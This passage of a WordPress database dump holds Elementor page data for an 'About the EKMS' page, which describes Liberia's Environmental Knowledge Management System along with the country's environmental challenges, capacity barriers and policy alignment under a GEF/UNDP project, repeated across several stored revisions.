Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12068,1961,'_elementor_edit_mode','builder'),(12069,1961,'_elementor_template_type','wp-page'),(12070,1961,'_elementor_version','2.7.5'),(12071,1961,'_wp_page_template','default'),(12072,1961,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p><p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships.  Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"87ab3af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12075,1962,'_elementor_edit_mode','builder'),(12076,1962,'_elementor_template_type','wp-page'),(12077,1962,'_elementor_version','2.7.5'),(12078,1962,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (12079,1962,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor 